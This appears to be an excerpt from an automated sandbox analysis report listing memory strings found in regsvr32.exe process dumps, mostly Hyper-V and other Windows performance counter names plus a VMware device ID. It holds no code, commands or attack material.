Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: regsvr32.exe, 00000008.00000003.1807203427.0000000002768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ansitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/s
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000008.00000003.1808144317.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808683293.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808165478.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808314026.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808555082.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1800365313.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808533714.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808630037.000000000282D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1800161121.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1800519413.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807953878.000000000282D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp In
Source: regsvr32.exe, 00000008.00000003.1800714954.0000000002833000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1809353860.0000000002835000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1801477539.0000000002835000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1808800604.0000000002851000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1809279203.0000000002851000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818I
Source: regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000008.00000003.2088789519.000000000290A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2320947816.0000000002DF9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWuv
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitionui
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition*=
Source: regsvr32.exe, 00000010.00000003.1993680972.0000000002CD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ot Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5
Source: regsvr32.exe, 00000010.00000003.2020259374.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partitionmun5
Source: regsvr32.exe, 00000008.00000003.1801142128.000000000270C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1793582257.000000000270C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Tra
Source: regsvr32.exe, 00000008.00000003.2092606345.000000000291D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092953875.0000000002946000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2332362864.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2332847185.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003985000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V HypervisorH
Source: regsvr32.exe, 00000008.00000003.1801724260.0000000002732000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1807568919.0000000002732000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2331064424.000000000123C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2326216192.0000000003A03000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000002.2333007615.0000000001259000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2032234436.0000000001245000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2019625539.0000000003909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V wwqkrpglnloojsk Bus
Source: regsvr32.exe, 00000008.00000003.1801309074.0000000000DF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Ranges/sec5078Page Table Evictions/sec5080Page Table Reclamations/sec5082Page Table Re
Source: regsvr32.exe, 00000008.00000003.1800581140.00000000026F9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1795089953.00000000026E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1799588227.00000000026F9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1799915558.00000000026EF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1795264291.00000000026F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Se
Source: regsvr32.exe, 00000008.00000003.1820951709.000000000335A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.000000000335B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2017378313.0000000002DD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000388B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionn
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service4%?
Source: regsvr32.exe, 00000008.00000003.1827269444.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2092139747.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1820951709.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.2096853913.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000010.00000003.2325195653.000000000390A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid PartitionB={
Source: regsvr32.exe, 00000008.00000003.1807239106.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
